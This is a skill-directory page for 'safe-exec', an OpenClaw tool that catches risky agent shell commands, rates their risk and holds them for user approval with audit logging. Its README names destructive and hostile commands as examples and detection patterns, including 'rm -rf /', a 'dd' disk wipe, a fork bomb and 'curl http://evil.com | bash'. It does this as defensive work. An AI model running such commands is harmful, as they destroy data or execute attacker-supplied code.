OpenClaw logo
OpenClaw Skills
skills$openclaw/safe-exec
ottttto816

by ottttto

safe-exec – OpenClaw Skill

safe-exec is an OpenClaw Skills integration for communication workflows. Safe command execution for OpenClaw Agents with automatic danger pattern detection, risk assessment, user approval workflow, and audit logging. Use when agents need to execute shell commands that may be dangerous (rm -rf, dd, fork bombs, system directory modifications) or require human oversight. Provides multi-level risk assessment (CRITICAL/HIGH/MEDIUM/LOW), in-session notifications, pending request management, and non-interactive environment support for agent automation.

816 stars7.5k forksSecurity L1
Updated Feb 7, 2026Created Feb 7, 2026communication

Skill Snapshot

namesafe-exec
descriptionSafe command execution for OpenClaw Agents with automatic danger pattern detection, risk assessment, user approval workflow, and audit logging. Use when agents need to execute shell commands that may be dangerous (rm -rf, dd, fork bombs, system directory modifications) or require human oversight. Provides multi-level risk assessment (CRITICAL/HIGH/MEDIUM/LOW), in-session notifications, pending request management, and non-interactive environment support for agent automation. OpenClaw Skills integration.
ownerottttto
repositoryottttto/safe-exec
languageMarkdown
licenseMIT
topics
securityL1
installopenclaw add @ottttto/safe-exec
last updatedFeb 7, 2026

Maintainer

ottttto

ottttto

Maintains safe-exec in the OpenClaw Skills directory.

View GitHub profile
File Explorer
38 files
.
docs
BLOG_EN.md
11.2 KB
BLOG.md
10.6 KB
CONTRIBUTING.md
1.4 KB
FIX_REPORT_v0.1.3.md
4.2 KB
FIX_REPORT_v0.2.3.md
4.1 KB
GITHUB_ISSUE_MONITOR.md
3.8 KB
GITHUB_RELEASE_v0.2.0.md
4.6 KB
GLOBAL_SWITCH_GUIDE.md
5.9 KB
PROJECT_REPORT.md
4.7 KB
PUBLISHING_GUIDE.md
6.6 KB
RELEASE_NOTES.md
1.5 KB
RELEASE_v0.2.0.md
5.3 KB
RELEASE_v0.2.4.md
2.6 KB
USAGE.md
5.4 KB
scripts
safe-exec-ai-wrapper.sh
690 B
safe-exec-approve.sh
1.6 KB
safe-exec-list.sh
1.1 KB
safe-exec-reject.sh
1.0 KB
safe-exec.sh
12.5 KB
tests
test.sh
967 B
tools
publish-to-github.sh
4.6 KB
push-to-github.sh
998 B
release.sh
4.8 KB
_meta.json
270 B
CHANGELOG.md
5.5 KB
IMPACT_ASSESSMENT.md
5.9 KB
PROJECT_STRUCTURE.md
3.8 KB
README_EN.md
14.6 KB
README-detail.md
9.9 KB
README.md
5.0 KB
RELEASE_v0.3.2.md
2.1 KB
SKILL.md
6.7 KB
UNIFIED_MONITOR.md
6.1 KB
UPDATE_NOTES.md
2.3 KB
SKILL.md

name: safe-exec description: Safe command execution for OpenClaw Agents with automatic danger pattern detection, risk assessment, user approval workflow, and audit logging. Use when agents need to execute shell commands that may be dangerous (rm -rf, dd, fork bombs, system directory modifications) or require human oversight. Provides multi-level risk assessment (CRITICAL/HIGH/MEDIUM/LOW), in-session notifications, pending request management, and non-interactive environment support for agent automation.

Quick Install: Say "Help me install SafeExec skill from ClawdHub" in your OpenClaw chat to automatically install and enable this safety layer.

Report Issues: https://github.com/OTTTTTO/safe-exec/issues - Community feedback and bug reports welcome!

SafeExec - Safe Command Execution

Provides secure command execution capabilities for OpenClaw Agents with automatic interception of dangerous operations and approval workflow.

Features

  • 🔍 Automatic danger pattern detection - Identifies risky commands before execution
  • 🚨 Risk-based interception - Multi-level assessment (CRITICAL/HIGH/MEDIUM/LOW)
  • 💬 In-session notifications - Real-time alerts in your current terminal/session
  • User approval workflow - Commands wait for explicit confirmation
  • 📊 Complete audit logging - Full traceability of all operations
  • 🤖 Agent-friendly - Non-interactive mode support for automated workflows
  • 🔧 Platform-agnostic - Works independently of communication tools (Feishu, Telegram, etc.)

Quick Start

Installation (One Command)

The easiest way to install SafeExec:

Just say in your OpenClaw chat:

Help me install SafeExec skill from ClawdHub

OpenClaw will automatically download, install, and configure SafeExec for you!

Alternative: Manual Installation

If you prefer manual installation:

# Using ClawdHub CLI
export CLAWDHUB_REGISTRY=https://www.clawhub.ai
clawdhub install safe-exec

# Or download directly from GitHub
git clone https://github.com/OTTTTTO/safe-exec.git ~/.openclaw/skills/safe-exec
chmod +x ~/.openclaw/skills/safe-exec/safe-exec*.sh

Enable SafeExec

After installation, simply say:

Enable SafeExec

SafeExec will start monitoring all shell commands automatically!

How It Works

Once enabled, SafeExec automatically monitors all shell command executions. When a potentially dangerous command is detected, it intercepts the execution and requests your approval through in-session terminal notifications.

Architecture:

  • Requests stored in: ~/.openclaw/safe-exec/pending/
  • Audit log: ~/.openclaw/safe-exec-audit.log
  • Rules config: ~/.openclaw/safe-exec-rules.json

Usage

Enable SafeExec:

Enable SafeExec

Turn on SafeExec

Start SafeExec

Once enabled, SafeExec runs transparently in the background. Agents can execute commands normally, and SafeExec will automatically intercept dangerous operations:

Delete all files in /tmp/test

Format the USB drive

SafeExec detects the risk level and displays an in-session prompt for approval.

Risk Levels

CRITICAL: System-destructive commands (rm -rf /, dd, mkfs, etc.) HIGH: User data deletion or significant system changes MEDIUM: Service operations or configuration changes LOW: Read operations and safe file manipulations

Approval Workflow

  1. Agent executes a command
  2. SafeExec analyzes the risk level
  3. In-session notification displayed in your terminal
  4. Approve or reject via:
    • Terminal: safe-exec-approve <request_id>
    • List pending: safe-exec-list
    • Reject: safe-exec-reject <request_id>
  5. Command executes or is cancelled

Example notification:

🚨 **Dangerous Operation Detected - Command Intercepted**

**Risk Level:** CRITICAL
**Command:** `rm -rf /tmp/test`
**Reason:** Recursive deletion with force flag

**Request ID:** `req_1769938492_9730`

ℹ️  This command requires user approval to execute.

**Approval Methods:**
1. In terminal: `safe-exec-approve req_1769938492_9730`
2. Or: `safe-exec-list` to view all pending requests

**Rejection Method:**
 `safe-exec-reject req_1769938492_9730`

Configuration

Environment variables for customization:

  • SAFE_EXEC_DISABLE - Set to '1' to globally disable safe-exec
  • OPENCLAW_AGENT_CALL - Automatically enabled in agent mode (non-interactive)
  • SAFE_EXEC_AUTO_CONFIRM - Auto-approve LOW/MEDIUM risk commands

Examples

Enable SafeExec:

Enable SafeExec

After enabling, agents work normally:

Delete old log files from /var/log

SafeExec automatically detects this is HIGH risk (deletion) and displays an in-session approval prompt.

Safe operations pass through without interruption:

List files in /home/user/documents

This is LOW risk and executes without approval.

Global Control

Check status:

safe-exec-list

View audit log:

cat ~/.openclaw/safe-exec-audit.log

Disable SafeExec globally:

Disable SafeExec

Or set environment variable:

export SAFE_EXEC_DISABLE=1

Reporting Issues

Found a bug? Have a feature request?

Please report issues at: 🔗 https://github.com/OTTTTTO/safe-exec/issues

We welcome community feedback, bug reports, and feature suggestions!

When reporting issues, please include:

  • SafeExec version (run: grep "VERSION" ~/.openclaw/skills/safe-exec/safe-exec.sh)
  • OpenClaw version
  • Steps to reproduce
  • Expected vs actual behavior
  • Relevant logs from ~/.openclaw/safe-exec-audit.log

Audit Log

All command executions are logged with:

  • Timestamp
  • Command executed
  • Risk level
  • Approval status
  • Execution result
  • Request ID for traceability

Log location: ~/.openclaw/safe-exec-audit.log

Integration

SafeExec integrates seamlessly with OpenClaw agents. Once enabled, it works transparently without requiring changes to agent behavior or command structure. The approval workflow is entirely local and independent of any external communication platform.

Platform Independence

SafeExec operates at the session level, working with any communication channel your OpenClaw instance supports (webchat, Feishu, Telegram, Discord, etc.). The approval workflow happens through your terminal, ensuring you maintain control regardless of how you're interacting with your agent.

Support & Community

License

MIT License - See LICENSE for details.

README.md

SafeExec - AI Agent 安全防护层

🛡️ 为 AI Agent 添加最后一道防线 - 拦截危险命令,保护你的系统

License: MIT OpenClaw Security ClawdHub

🌐 Languages: 中文 | English

✨ 为什么需要 SafeExec?

AI Agents 是强大的助手,但也可能造成严重损害:

  • 💥 误删数据 - 一句"清理临时文件"可能变成 rm -rf /
  • 🔥 系统破坏 - "优化磁盘"可能执行 dd if=/dev/zero of=/dev/sda
  • 🚪 安全漏洞 - "安装这个工具"可能运行 curl http://evil.com | bash

SafeExec 就是为解决这个问题而生。

🎯 核心功能

1️⃣ 智能风险评估

自动检测 10+ 类危险操作,分级拦截:

风险等级检测模式示例
🔴 CRITICALrm -rf /删除系统文件
🔴 CRITICALdd if=磁盘破坏
🔴 CRITICALmkfs.*格式化文件系统
🔴 CRITICALFork bomb系统 DoS
🟠 HIGHchmod 777权限提升
🟠 HIGHcurl | bash代码注入
🟠 HIGH写入 /etc/系统配置篡改
🟡 MEDIUMsudo特权操作
🟡 MEDIUM防火墙修改网络暴露

2️⃣ 命令拦截与审批

用户请求 → AI Agent → safe-exec 执行
                         ↓
                    风险评估
                    /      \
               安全      危险
                |           |
            直接执行    请求批准

3️⃣ 完整审计日志

所有命令执行记录:

  • 时间戳
  • 命令内容
  • 风险等级
  • 批准状态
  • 执行结果

🚀 快速开始

方式 1:对话式安装(推荐)

最简单的方式 - 在 OpenClaw 对话中一键安装:

Help me install SafeExec skill from ClawdHub

或中文:

帮我安装 ClawdHub 中的 SafeExec skills

OpenClaw 会自动:

  1. 从 ClawdHub 下载 SafeExec
  2. 安装到系统
  3. 配置并启用

方式 2:使用 ClawdHub CLI

# 设置 registry
export CLAWDHUB_REGISTRY=https://www.clawhub.ai

# 安装 SafeExec
clawdhub install safe-exec

# 启用 SafeExec
echo "Enable SafeExec" | openclaw

方式 3:从 GitHub 安装

# 克隆到 OpenClaw skills 目录
git clone https://github.com/OTTTTTO/safe-exec.git ~/.openclaw/skills/safe-exec

# 添加执行权限
chmod +x ~/.openclaw/skills/safe-exec/scripts/*.sh

# 创建软链接到 PATH
ln -sf ~/.openclaw/skills/safe-exec/safe-exec.sh ~/.local/bin/safe-exec
ln -sf ~/.openclaw/skills/safe-exec/scripts/safe-exec-*.sh ~/.local/bin/

# 启用 SafeExec
~/.local/bin/safe-exec --enable

💬 使用方法

启用 SafeExec

对话式命令:

Enable SafeExec

Turn on SafeExec

启动安全命令执行

启用后,SafeExec 在后台自动监控所有 shell 命令。

正常使用

启用后,你可以正常与 Agent 对话:

Delete old log files from /var/log

SafeExec 会自动:

  1. 检测这是 HIGH 风险操作(删除)
  2. 在终端显示批准提示
  3. 等待你批准后执行

安全操作直接通过

低风险操作无需批准:

List files in /home/user/documents

这会直接执行,无需干预。

查看状态

# 查看待处理的请求
~/.local/bin/safe-exec-list

# 或使用完整路径
~/.openclaw/skills/safe-exec/scripts/safe-exec-list.sh

# 查看审计日志
cat ~/.openclaw/safe-exec-audit.log

禁用 SafeExec

对话式:

Disable SafeExec

或环境变量:

export SAFE_EXEC_DISABLE=1

📖 详细文档

想要了解更多?查看完整文档:

🔗 相关链接

📊 许可证

MIT License - 详见 LICENSE

⭐ Star History

Star History Chart

如果这个项目对你有帮助,请给个 ⭐️

Permissions & Security

Security level L1: Low-risk skills with minimal permissions. Review inputs and outputs before running in production.

Requirements

  • OpenClaw CLI installed and configured.
  • Language: Markdown
  • License: MIT
  • Topics:

Configuration

Environment variables for customization: - `SAFE_EXEC_DISABLE` - Set to '1' to globally disable safe-exec - `OPENCLAW_AGENT_CALL` - Automatically enabled in agent mode (non-interactive) - `SAFE_EXEC_AUTO_CONFIRM` - Auto-approve LOW/MEDIUM risk commands

FAQ

How do I install safe-exec?

Run openclaw add @ottttto/safe-exec in your terminal. This installs safe-exec into your OpenClaw Skills catalog.

Does this skill run locally or in the cloud?

OpenClaw Skills execute locally by default. Review the SKILL.md and permissions before running any skill.

Where can I verify the source code?

The source repository is available at https://github.com/openclaw/skills/tree/main/skills/ottttto/safe-exec. Review commits and README documentation before installing.